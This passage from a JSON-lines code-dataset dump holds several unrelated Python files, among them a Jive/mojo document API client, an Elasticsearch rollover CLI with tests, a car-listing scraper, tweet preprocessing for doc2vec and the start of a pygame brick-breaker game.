      '\n str_doc = json.dumps(j_doc)\n self.put(url_content, str_doc)\n if self.r.status_code != 200:\n logging.error(\"Update doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return 0\n\n def delete_document(self, doc_id):\n \"\"\" Delete document \"\"\"\n logging.info(\"Delete document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n self.delete(url_content)\n if self.r.status_code != 204:\n logging.error(\"Delete doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return 0\n\n def get_document(self, doc_id):\n \"\"\" Get document \"\"\"\n logging.info(\"Get document %s\" % doc_id)\n url_content = self.document2content(doc_id)\n doc = self.get(url_content)\n html = self.get_html(doc, prettify=False)\n if self.r.status_code != 200:\n logging.error(\"GET doc %s error with code %s, text %s\" % (doc_id, self.r.status_code, self.r.text))\n return self.r.status_code\n return html\n\n def get_user(self, username):\n \"\"\" Get user info from mojo \"\"\"\n logging.info(\"Getting username %s\" % username)\n url = requests.compat.urljoin(self.base_url, \"people/username/%s\" % username)\n return self.get(url)\n\n def create_task(self, place_id, data):\n \"\"\" Create task in mojo place (project)\"\"\"\n logging.info(\"Creating task: %s\" % data['subject'])\n url = requests.compat.urljoin(self.base_url, \"places/%s/tasks\" % place_id)\n return self.post(url, json.dumps(data))\n\n def create_project(self, parent_place_id, name, display_name, start_date, due_date, **kwargs):\n \"\"\" Create project in mojo place (place)\"\"\"\n data = dict(\n parent=requests.compat.urljoin(self.base_url, \"places/%s\" % parent_place_id),\n name=name,\n displayName=display_name,\n startDate=start_date.strftime(\"%Y-%m-%dT%H:%M:%S%z\") if type(start_date) is datetime else start_date, # required in \"2012-07-02T07:00:00.000+0000\" format\n dueDate=due_date.strftime(\"%Y-%m-%dT%H:%M:%S%z\") if type(due_date) is datetime else due_date, # required in \"2012-07-02T07:00:00.000+0000\" format\n type=\"project\",\n )\n data.update(kwargs)\n logging.info(\"Creating project: %s\" % data)\n url = requests.compat.urljoin(self.base_url, \"places\")\n return self.post(url, json.dumps(data))\n\n def create_checkpoints(self, place_id, data):\n \"\"\" Create checkpoints for a mojo project\"\"\"\n logging.info(\"Creating project checkpoints\")\n url = requests.compat.urljoin(self.base_url, \"checkpoints/%s\" % place_id)\n return self.post(url, json.dumps(data))\n\n @staticmethod\n def get_html(j_doc, prettify=True):\n \"\"\" Parse html content for document \"\"\"\n # parser = MyHTMLParser()\n # parser.feed(j_doc[\"content\"][\"text\"])\n soup = BeautifulSoup(j_doc[\"content\"][\"text\"])\n doc_body = ''\n for i in soup.find('div', {'class': 'jive-rendered-content'}).contents:\n doc_body += str(i)\n if not prettify:\n return doc_body\n soup = BeautifulSoup(doc_body)\n f = open(\"soap.html\", 'w')\n doc_body = soup.prettify()\n f.write(doc_body.encode(\"UTF-8\"))\n f.close()\n return doc_body\n\n @staticmethod\n def text2html(text):\n \"\"\" Generate html \"\"\"\n html_src = ''\n for l in text.splitlines():\n if re.match('^\\s*$', l):\n html_src += '
\\n'\n            else:\n                l = l.replace('&', '&amp;')\n                l = l.replace('<', '&lt;')\n                l = l.replace('>', '&gt;')\n                html_src = html_src + '
<p>'+l+'</p>
      \\n'\n html_src += ''\n # for debugging\n # f = open('test.html', 'w')\n # f.write(html_src)\n # f.close()\n\n return html_src\n\n\nclass EmailHelper(object):\n def __init__(self, mail_list=None, tmp_dir='/tmp/', filter_method='default', filter_key=None):\n self.tmp_dir = tmp_dir\n if not mail_list:\n self.email_archives = 'http://post-office.corp.redhat.com/archives/virt-qe-list/'\n else:\n self.email_archives = 'http://post-office.corp.redhat.com/archives/' + mail_list + '/'\n r = urllib.urlopen(self.email_archives)\n if r.code != 200:\n logging.error('Invalid mail list given: %s, HTTP request got error code: %s' % (mail_list, r.code))\n exit(r.code)\n self.filter_method = filter_method\n if filter_key:\n self.filter_key = filter_key\n else:\n self.filter_key = ''\n\n def download_mbox(self, name):\n download_url = self.email_archives + name + '.txt.gz'\n local_path_zipped = self.tmp_dir + name + '.txt.gz'\n local_path = self.tmp_dir + name + '.txt'\n urllib.urlretrieve(download_url, local_path_zipped)\n in_f = gzip.GzipFile(local_path_zipped, 'rb')\n s = in_f.read()\n in_f.close()\n out_f = file(local_path, 'wb')\n out_f.write(s)\n out_f.close()\n\n def load_mbox(self, name):\n file_name = self.tmp_dir + name + '.txt'\n mbox = mailbox.mbox(file_name)\n for message in mbox:\n # print re.sub('\\n\\s+', ' ', message['subject'])\n if self.filter(message):\n yield {\"subject\": re.sub('\\n\\s+', ' ', message['subject']), \"body\": self.get_body(message)}\n mbox.close()\n\n def clean_mbox(self, name):\n os.remove(self.tmp_dir + name + '.txt')\n os.remove(self.tmp_dir + name + '.txt.gz')\n\n @staticmethod\n def get_body(msg):\n body = None\n # Walk through the parts of the email to find the text body.\n if msg.is_multipart():\n for part in msg.walk():\n # If part is multipart, walk through the subparts.\n if part.is_multipart():\n for subpart in part.walk():\n if subpart.get_content_type() == 'text/plain':\n # Get the subpart payload (i.e the message body)\n body = subpart.get_payload(decode=True)\n # charset = subpart.get_charset()\n # Part isn't multipart so get the email body\n elif part.get_content_type() == 'text/plain':\n body = part.get_payload(decode=True)\n # charset = part.get_charset()\n # If this isn't a multi-part message then get the payload (i.e the message body)\n elif msg.get_content_type() == 'text/plain':\n body = msg.get_payload(decode=True)\n # special handling for Thunderbird which use markup syntax in text/plain\n for header in msg._headers:\n if header[0] == 'User-Agent' and 'Thunderbird' in header[1]:\n tmp = body.replace('*', ' ')\n body = re.sub('<[^>]*>', '', tmp)\n return body\n\n def filter_body(self, msg):\n body = self.get_body(msg)\n if type(body) is not str:\n return False\n if self.filter_key in body:\n return True\n else:\n return False\n\n def filter_subject(self, msg):\n if self.filter_key == '':\n self.filter_key = '^RHEV-H 7.0 for RHEV 3.5*'\n if re.match(self.filter_key, msg['subject'], re.DOTALL):\n return True\n else:\n return False\n\n def filter_from(self, msg):\n if self.filter_key in msg._from:\n return True\n else:\n return False\n\n def filter(self, msg):\n if self.filter_method == 'subject':\n return self.filter_subject(msg)\n elif self.filter_method == 'from':\n return self.filter_from(msg)\n elif self.filter_method == 'body':\n return self.filter_body(msg)\n else:\n return self.filter_subject(msg)\n\n\nclass Report(object):\n \"\"\"\n report={'month': 'yyyy-mm', 'ref': 'email'}\n email={'subject': 'xxxx', 'body': 'xxxx', 'ref': 
'mojo_link'}\n \"\"\"\n def __init__(self, mojo, months=None, skip=0, place_id=None, doc_id=None, title='MOJO Report', mail_list=None, filter_method='subject', filter_key=None):\n self.mojo = mojo\n self.email = EmailHelper(mail_list=mail_list, filter_method=filter_method, filter_key=filter_key)\n self.months_update = []\n self.months_list = {}\n self.title = title\n if not months:\n months = 3\n if place_id:\n try:\n test_place_id = int(place_id)\n logging.info(\"Place ID = %d\" % test_place_id)\n self.place_id = test_place_id\n except ValueError:\n self.place_id = None\n logging.error(\"Place ID is string: %s\" % place_id)\n else:\n self.place_id = None\n # for existing report, load it first and update the specify months\n # for new report, create a new mojo page and load specify months\n if doc_id:\n self.load_report()\n date = datetime.datetime.now()\n if skip > 0:\n for i in range(skip):\n date = datetime.date(day=1, month=date.month, year=date.year) - datetime.timedelta(days=1)\n for d in range(months):\n year = date.year\n month = date.strftime(\"%m\")\n logging.debug(\"Month will be processed: %s\" % str(year) + str(month))\n self.months_update.append(str(year) + str(month))\n date = datetime.date(day=1, month=date.month, year=date.year) - datetime.timedelta(days=1)\n\n @staticmethod\n def gen_report(test_list, catalog):\n html_src = '
<p><span style=\"font-size: 14pt;\">'+catalog+'</span></p>
\\n'\n        for i in test_list:\n            html_src = html_src + '<p><a href=\"' + i['ref'] + '\">' + i['subject'] + '</a></p>\\n'\n        html_src += '<p>&nbsp;</p>
      \\n'\n return html_src\n\n def publish_report(self, doc_id=None, dry_run=False):\n html_src = ''\n for month in self.months_update:\n if month in self.months_list:\n report_items = self.months_list[month]\n else:\n report_items = []\n self.months_list[month] = report_items\n date = datetime.datetime.strptime(month, '%Y%m')\n month = date.strftime('%Y-%B')\n self.email.download_mbox(month)\n emails = self.email.load_mbox(month)\n for i in emails:\n new = False\n if not any(d['subject'] == i['subject'] for d in report_items):\n new = True\n if new and not dry_run:\n mojo_link = self.mojo.create_document(i['subject'], self.mojo.text2html(i['body']).replace('\\n', ''), place_id=self.place_id)\n i['ref'] = mojo_link\n report_items.append(i)\n logging.info(i['subject'])\n logging.info(i['ref'])\n elif new and dry_run:\n i['ref'] = 'dry_run'\n report_items.append(i)\n logging.info(i['subject'])\n logging.info(i['ref'])\n self.email.clean_mbox(month)\n html_src += self.gen_report(report_items, month)\n if dry_run:\n logging.info(html_src)\n return\n\n if doc_id:\n self.mojo.update_document(doc_id, html_src)\n else:\n mojo_link = self.mojo.create_document(self.title, html_src, place_id=self.place_id)\n logging.info('Here is the mojo link for final report: %s' % self.title)\n logging.info(mojo_link)\n\n def load_report(self, doc_id):\n html = self.mojo.get_document(doc_id)\n soup = BeautifulSoup(html)\n report_items = []\n old_month = '000000'\n for i in soup.find_all('p'):\n if type(i.next) is not bs4.element.Tag:\n continue\n if i.next.name == 'span' and 'style' in i.next.attrs:\n date = datetime.datetime.strptime(i.text, '%Y-%B')\n cur_month = date.strftime('%Y%m')\n if cur_month != old_month and old_month != '000000':\n self.months_list[old_month] = report_items\n report_items = []\n old_month = cur_month\n if i.next.name == 'a' and 'href' in i.next.attrs:\n item = {'subject': i.text.encode(\"ascii\"), 'ref': i.next.attrs['href']}\n report_items.append(item)\n if old_month != '000000':\n self.months_list[old_month] = report_items\n\n def delete_report(self, doc_id=None):\n if doc_id is None:\n return 1\n url_content = self.mojo.document2content(doc_id)\n j_doc = self.mojo.get(url_content)\n html = self.mojo.get_html(j_doc)\n soup = BeautifulSoup(html, \"lxml\")\n for a in soup.findAll('a'):\n url = a['href']\n logging.info(url)\n id = re.sub(r'https://mojo.redhat.com/docs/DOC-', \"\", url)\n self.mojo.delete_document(id)\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.recording = 0\n self.data = []\n self.count = 0\n\n def handle_starttag(self, tag, attributes):\n if tag != 'div':\n return\n for name, value in attributes:\n if name == 'class' and value == 'jive-rendered-content':\n self.recording = 1\n else:\n self.recording -= 1\n return\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recording:\n self.recording -= 1\n\n def handle_data(self, data):\n if self.recording:\n self.count += 1\n print('wshi---' + str(self.count))\n print(data)\n self.data = data\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s')\n import sys\n mojo = MOJOApi()\n\n report = Report(mojo, mail_list='virt-qe-list', filter_method='body', filter_key='7.2+Virt+QE+-+Week+')\n # report.load_report(1015195)\n # report.publish_report(1015195, dry_run=True)\n # report.publish_report()\n report.delete_report(1060753)\n # sys.exit(0)\n\n x = mojo.delete_document(1060753)\n # print 
mojo.create_document(\"test\", \"content\")\n # x = mojo.update_document(1060649, \"update\")\n # f = open(\"data.html\", 'r')\n # c = f.read()\n # x = mojo.update_document(1060649, c.replace('\\n', ''))\n","sub_path":"mojo_api/mojo_api.py","file_name":"mojo_api.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"291892084","text":"# No 1\n# def calculate_years(principal, inyerest, tax, desired):\n\n# No 2\ndef expandedForm(num):\n expand1=str(num)\n expand2=[]\n expand3=[]\n for i in range(len(expand1)):\n expand2.append(expand1[i:])\n for j in range(len(expand2)):\n expand3.append(str(expand2[j]))\n print('+'.join(expand3))\nexpandedForm(12)\nexpandedForm(42)\nexpandedForm(70304)\n\ndef tower_builder(n_floor,block_size):\n w,h=block_size\n width=int(w)\n height=int(h)\n floor=int(n_floor)\n o=\"\"\n p=\"\"\n q=\"\"\n for a in range(width):\n for b in range(0,width-1-a):\n o+=\" \"\n for c in range(0,(width*a+2)):\n o+=\" * \"\n o+=\"\\n\"\n print(o)\n for k in range(height):\n for l in range(0,height):\n p+=\" \"\n for m in range(0,width):\n p+=\" * \"\n p+=\"\\n\"\n print(p)\n for x in range(floor):\n for y in range(0, height):\n q+=\" \"\n for z in range(0,width):\n q+=\" * \"\n q+=\"\\n\"\n print(q)\ntower_builder(3,(2,3))","sub_path":"ujian_modul_1.py","file_name":"ujian_modul_1.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"652930468","text":"# Copyright 2019 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\n'''Implement the LUCI \"run_build\" protocol.\n\nThis expects to read a build.proto[1] Build message on stdin (binary-encoded\nprotobuf), and will execute the task accordingly, selecting the recipe to run\nfrom the 'recipe' property of the `Build.input.properties` field.\n\nThis synthesizes properties from the Build message:\n * $recipe_engine/runtime['is_experimental'] = Build.input.experimental\n * $recipe_engine/runtime['is_luci'] = true\n * $recipe_engine/path['temp_dir'] = os.environ['TMP']\n * $recipe_engine/path['cache_dir'] = os.environ['LUCI_CACHE_DIR']\n'''\n\nimport argparse\nimport sys\nimport logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RunBuildContractViolation(Exception):\n pass\n\n\ndef add_arguments(parser):\n parser.add_argument(\n '--final-state', type=argparse.FileType('wb'),\n help='Path to write the final build.proto state to (as binary PB).')\n parser.add_argument(\n '--build-proto-jsonpb', action='store_true',\n help=(\n 'If specified, output build.proto datagrams as JSONPB instead of PB. 
'\n 'Only for debugging.'\n ))\n\n def _launch(args):\n from .cmd import main\n try:\n return main(args)\n except RunBuildContractViolation as ex:\n LOG.fatal('\"run_build\" protocol contract violation: %s', ex)\n return 1\n\n def _post(_error, _args):\n logging.basicConfig()\n\n parser.set_defaults(func=_launch, postprocess_func=_post)\n","sub_path":"recipe_engine/internal/commands/run_build/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"431287115","text":"#!/usr/bin/python3\n\nimport click\nimport logging\n\nfrom large_index.log import Log\nfrom large_index.config import Config\nfrom large_index.init import Init\nfrom large_index.structure import Structure\n\nclass_config = Config\nclass_structure = Structure()\nclass_log = Log()\n\nclass_log.remove_old_log_file()\nclass_log.get_file_handler()\nclass_log.get_stream_handler()\nclass_log.get_logger()\n\ndef logging_level(level):\n if level:\n logging_level_critical(level)\n logging_level_error(level)\n logging_level_warning(level)\n logging_level_info(level)\n logging_level_debug(level)\n logging_level_notset(level)\n\ndef logging_level_critical(level):\n if level == 'critical' or level == 'CRITICAL' or level == '=critical' or level == '=CRITICAL':\n class_log.logger.setLevel(logging.CRITICAL)\n\ndef logging_level_error(level):\n if level == 'error' or level == 'ERROR' or level == '=error' or level == '=ERROR':\n class_log.logger.setLevel(logging.ERROR)\n\ndef logging_level_warning(level):\n if level == 'warning' or level == 'WARNING' or level == '=warning' or level == '=WARNING':\n class_log.logger.setLevel(logging.WARNING)\n\ndef logging_level_info(level):\n if level == 'info' or level == 'INFO' or level == '=info' or level == '=INFO':\n class_log.logger.setLevel(logging.INFO)\n\ndef logging_level_debug(level):\n if level == 'debug' or level == 'DEBUG' or level == '=debug' or level == '=DEBUG':\n class_log.logger.setLevel(logging.DEBUG)\n\ndef logging_level_notset(level):\n if level == 'notset' or level == 'NOTSET' or level == '=notset' or level == '=NOTSET':\n class_log.logger.setLevel(logging.NOTSET)\n\ndef generating_variables():\n class_config.index_pools = Init(count = 4).list_pools()\n class_config.ilm_list = class_config.index_pools[3].json()\n class_config.settings_list = class_config.index_pools[2].json()\n class_config.alias_list = class_config.index_pools[1].json()\n\n class_structure.logger = class_log.logger\n\n class_structure.create_array_index_details_in_open()\n class_structure.create_array_index_to_remove()\n class_structure.remove_system_index_in_array()\n class_structure.create_array_indices()\n class_structure.create_array_max_indices()\n\n del(class_structure.index_details)\n del(class_structure.index_to_remove)\n\n class_structure.create_array_invalid_size_index()\n class_structure.remove_invalid_data_in_index( class_structure.invalid_size_indices )\n\n class_structure.create_array_unmanaged_index()\n class_structure.remove_invalid_data_in_index( class_structure.unmanaged_indices )\n\n class_structure.create_array_not_hot_box_index()\n class_structure.remove_invalid_data_in_index( class_structure.not_hot_box_indices )\n\n class_structure.create_array_not_hot_phase_index()\n class_structure.remove_invalid_data_in_index( class_structure.not_hot_phase_indices )\n\n class_structure.create_array_shrink_index()\n class_structure.remove_invalid_data_in_index( 
class_structure.shrink_indices )\n\n class_structure.create_last_index()\n class_structure.create_not_last_index()\n class_structure.create_last_shrink_index()\n\n del(class_structure.invalid_size_indices)\n del(class_structure.unmanaged_indices)\n del(class_structure.not_hot_box_indices)\n del(class_structure.not_hot_phase_indices)\n\ndef start_rollover_all(check_mode):\n if not check_mode:\n class_structure.rollover_last_index()\n class_structure.rollover_not_last_index()\n class_structure.rollover_last_shrink_index()\n\ndef start_check_mode_rollover_all(check_mode):\n if check_mode:\n class_structure.rollover_last_index_in_check_mode()\n class_structure.rollover_not_last_index_in_check_mode()\n class_structure.rollover_last_shrink_index_in_check_mode()\n\ndef start_rollover_last_index(check_mode):\n if not check_mode:\n class_structure.rollover_last_index()\n\ndef start_check_mode_rollover_last_index(check_mode):\n if check_mode:\n class_structure.rollover_last_index_in_check_mode()\n\ndef start_rollover_not_last_index(check_mode):\n if not check_mode:\n class_structure.rollover_not_last_index()\n\ndef start_check_mode_rollover_not_last_index(check_mode):\n if check_mode:\n class_structure.rollover_not_last_index_in_check_mode()\n\ndef start_rollover_last_shrink_indices(check_mode):\n if not check_mode:\n class_structure.rollover_last_shrink_index()\n\ndef start_check_mode_rollover_last_shrink_indices(check_mode):\n if check_mode:\n class_structure.rollover_last_shrink_index_in_check_mode()\n\n@click.group()\n@click.version_option()\ndef cli():\n \"\"\"\n Rollover big indexes ilm in Elasticsearch.\n \"\"\"\n pass\n\n@cli.command(help='Rollover large indexes.')\n@click.option(\n '-c', '--check-mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef start(check_mode, log_level):\n \"\"\"\n Rollover large indexes.\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover large indexes\")\n\n generating_variables()\n start_rollover_all(check_mode)\n start_check_mode_rollover_all(check_mode)\n\n@cli.command(help='Rollover only the latest big indexes (not shrink).')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef last_index(check_mode, log_level):\n \"\"\"\n Rollover only the latest big indexes (not shrink index).\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the latest big indexes (not shrink index).\")\n\n generating_variables()\n start_rollover_last_index(check_mode)\n start_check_mode_rollover_last_index(check_mode)\n\n@cli.command(help='Rollover only the not latest big indexes (not shrink).')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. 
\\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef not_last_index(check_mode, log_level):\n \"\"\"\n Rollover only the not latest big indexes (not shrink index).\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the not latest big indexes (not shrink index)\")\n\n generating_variables()\n start_rollover_not_last_index(check_mode)\n start_check_mode_rollover_not_last_index(check_mode)\n\n@cli.command(help='Rollover only the latest big shrink indexes.')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef last_shrink_index(check_mode, log_level):\n \"\"\"\n Rollover only the latest big shrink indexes.\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the latest big shrink indexes\")\n\n generating_variables()\n start_rollover_last_shrink_indices(check_mode)\n start_check_mode_rollover_last_shrink_indices(check_mode)\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"large_index/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"507646248","text":"import mock\nimport pytest\n\n\n@pytest.fixture\ndef es(elasticsearch_server):\n from ..elasticsearch_client import ElasticsearchClient\n return ElasticsearchClient(elasticsearch_server, 'vms')\n\n\ndef test_WTAIndexer(es, sf):\n from ..commands.indexer import WTAIndexer\n indexer = WTAIndexer(es, sf)\n indexer.update_index()\n\n\ndef test_WorkPartyIndexer(es, sf):\n # add a work party that's not in Salesforce to make sure it gets removed\n es.index(doc_type='workparty', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import WorkPartyIndexer\n indexer = WorkPartyIndexer(es, sf)\n indexer.update_index()\n\n # Make sure TODELETE was removed and WP1 was added\n res = es.search(body={'filter': {'type': {'value': 'workparty'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'WP1'\n\n\ndef test_WaiverTextIndexer(es, sf):\n from ..commands.indexer import WaiverTextIndexer\n indexer = WaiverTextIndexer(es, sf)\n indexer.update_index()\n\n res = es.search(body={'filter': {'type': {'value': 'liabilitywaiver'}}})['hits']['hits']\n assert len(res) == 1\n\n\ndef test_LandManagerIndexer(es, sf):\n # add a land manager that's not in Salesforce to make sure it gets removed\n es.index(doc_type='landmanager', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import LandManagerIndexer\n indexer = LandManagerIndexer(es, sf)\n indexer.update_index()\n\n # Make sure TODELETE was removed and LM1 was added\n res = es.search(body={'filter': {'type': {'value': 'landmanager'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'LM1'\n\n\ndef test_AwardCustomizationIndexer(es, sf):\n # add an award customization that's not in Salesforce to make sure it gets removed\n es.index(doc_type='awardcustomization', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import AwardCustomizationIndexer\n indexer = AwardCustomizationIndexer(es, sf)\n 
indexer.update_index()\n\n # Make sure TODELETE was removed and AC1 was added\n res = es.search(body={'filter': {'type': {'value': 'awardcustomization'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'AC1'\n\n\ndef test_run_indexer(app):\n from ..commands.indexer import run_indexer\n abort_event = mock.Mock(**{'wait.return_value': True})\n run_indexer(app, abort_event)\n\n\ndef test_run_indexer_thread(mocker):\n app = mocker.Mock()\n mocker.patch('vms.commands.indexer.run_indexer')\n from ..commands.indexer import run_indexer_thread\n from ..commands.indexer import run_indexer\n run_indexer_thread(app)\n\n run_indexer.assert_called_once()\n","sub_path":"src/vms/tests/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"329563680","text":"import os\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport subprocess\n\nHEADERS = {\n \"user-agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n}\n\nHOST = \"https://avto.ria.com\"\nPATH = \"cars.csv\"\n\n\ndef get_html(url, params=None):\n response = requests.get(url, headers=HEADERS, params=params)\n return response\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, \"html.parser\")\n items = soup.find_all(\"div\", class_=\"proposition\")\n cars = []\n for item in items:\n cars.append(\n {\n \"title\": item.find(\"div\", class_=\"proposition_title\").get_text(\n strip=True\n ),\n \"link\": HOST + item.find(\"a\", class_=\"proposition_link\").get(\"href\"),\n \"photo\": item.find(\"div\", class_=\"photo-car\").find(\"img\").get(\"src\"),\n \"USD\": item.find(\"span\", class_=\"green\").get_text(strip=True),\n \"UAH\": item.find(\"span\", class_=\"grey size13\").get_text(strip=True),\n \"city\": item.find(\"div\", class_=\"proposition_region size13\")\n .find_next(\"strong\")\n .get_text(strip=True),\n }\n )\n return cars\n\n\ndef pages_count(html):\n soup = BeautifulSoup(html, \"html.parser\")\n pagination = soup.find_all(\"span\", class_=\"page-item mhide\")\n return int(pagination[-1].get_text())\n\n\ndef parse():\n url = input(\"Введите URL:\").strip()\n html = get_html(url)\n if not html.status_code == 200:\n return print(\"Error\")\n pages = pages_count(html.text)\n cars = []\n for page in range(1, pages + 1):\n html = get_html(url, params={\"page\": page})\n cars.extend(get_content(html.text))\n save_data(cars, PATH)\n\n\ndef save_data(data, path):\n with open(path, \"w\", newline=\"\") as fp:\n writer = csv.writer(fp, delimiter=\";\")\n writer.writerow([\"Brend\", \"Link\", \"USD\", \"UAH\", \"City\", \"Image\"])\n for item in data:\n writer.writerow(\n [\n item[\"title\"],\n item[\"link\"],\n item[\"USD\"],\n item[\"UAH\"],\n item[\"city\"],\n item[\"photo\"],\n ]\n )\n image = get_html(item[\"photo\"])\n name = item[\"photo\"].split(\"/\")[-1]\n\n if not os.path.exists('img/'):\n os.mkdir('img/')\n with open(f\"img/{name}\", \"wb\") as fp:\n fp.write(image.content)\n\nparse()\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"286453917","text":"import pickle\nfrom collections import 
Counter\nimport re\nimport numpy as np\nfrom stemming.porter2 import stem\nfrom gensim.models.doc2vec import TaggedDocument\n\nnegations = [\"didn't\", \"didn\", \"don\", \"don't\", \"not\", \"doesn\", \"doesn't\", \"isn\", \"isn't\"]\ndelims = [\"?\", \".\", \",\", \"!\", \":\", \";\"]\n\n\ndef tweets_to_tagged_sentences(tweets, key):\n tagged_documents = []\n for uid, tweet in enumerate(tweets):\n tagged_documents.append(TaggedDocument(words=tweet.split(), tags=[key+'_%s' % uid]))\n return tagged_documents\n\n\ndef preprocessing(dataset, key):\n # init\n tweets = []\n words = []\n\n # save all tweets as list of words in list \"tweets\"\n for i, tweet in enumerate(dataset):\n tweet_words = tweet.split()\n tweet_new_words = []\n neg = False\n for w in tweet_words:\n if w in delims:\n neg = False\n tweet_new_words.append(w)\n elif w in negations:\n neg = True\n tweet_new_words.append(w)\n elif neg:\n tweet_new_words.append(\"NOT_\"+w)\n else:\n tweet_new_words.append(w)\n\n words += tweet_new_words\n tweets.append(' '.join(tweet_new_words))\n\n if (i+1) % 500 == 0:\n print(\"Processing dataset '{}', tweet {}/{}\".format(key, i+1, len(dataset)))\n\n return tweets_to_tagged_sentences(tweets, key)\n\nprint(\"Loading datasets...\")\n\n# read training dataset\ndataset_trn_pos = open('data/train_pos.txt', 'r').read().splitlines()\ndataset_trn_neg = open('data/train_neg.txt', 'r').read().splitlines()\n\n# read test dataset\ndataset_tst_file = open('data/test_data.txt', 'r')\ndataset_tst = [re.sub('^[0-9]+,','', i)[:-2] for i in dataset_tst_file]\n\nprint(\"Starting preprocessing...\")\n\n# preprocess datasets\ndataset_trn_pos = preprocessing(dataset_trn_pos, 'trn_pos')\ndataset_trn_neg = preprocessing(dataset_trn_neg, 'trn_neg')\ndataset_tst = preprocessing(dataset_tst, 'tst')\n\n# save model and word_count\npickle.dump(dataset_trn_pos + dataset_trn_neg, open('preprocessing/dataset_trn', 'wb'))\npickle.dump(dataset_tst, open('preprocessing/dataset_tst', 'wb'))\n\n# create target dataset for training set\ntarget_tst = np.ravel(np.concatenate((np.ones((len(dataset_trn_pos), 1)),\n np.ones((len(dataset_trn_neg), 1))*-1)))\n\nnp.save('preprocessing/target_trn', target_tst)\n\nprint(\"Done!\")","sub_path":"code/doc2vec/1 preprocessing.py","file_name":"1 preprocessing.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"74319008","text":"# -*- coding: cp936 -*-\r\nimport pygame\r\nimport sys\r\nimport os\r\nfrom random import *\r\nfrom math import *\r\n#设定屏幕大小\r\nscreenSize = 600,600\r\n#设定砖块大小\r\nbrickWidth = 60\r\nbrickHeight = 15\r\n#设定挡板大小\r\nbaffleWidth = 80\r\nbaffleHeight = 12\r\n#设定小球大小\r\nradius = 8\r\ndiameter = 2*radius\r\n#设定挡板移动速度\r\nbaffleVelocity = 5\r\n#设定小球移动速度\r\nballVelocity = [5,5]\r\n#设定最大移动范围\r\nminXpos = 0\r\nminBallXpos = 0\r\nminBallYpos = 0\r\nmaxXpos = screenSize[0] - baffleWidth\r\nmaxBallXpos = screenSize[0] - diameter\r\nmaxBallYpos = screenSize[1] - diameter - 10\r\n#设定挡板位置(均以左上角计)\r\nbaffleXpos = (screenSize[0] - baffleWidth)/2\r\nbaffleYpos = screenSize[1] - baffleHeight 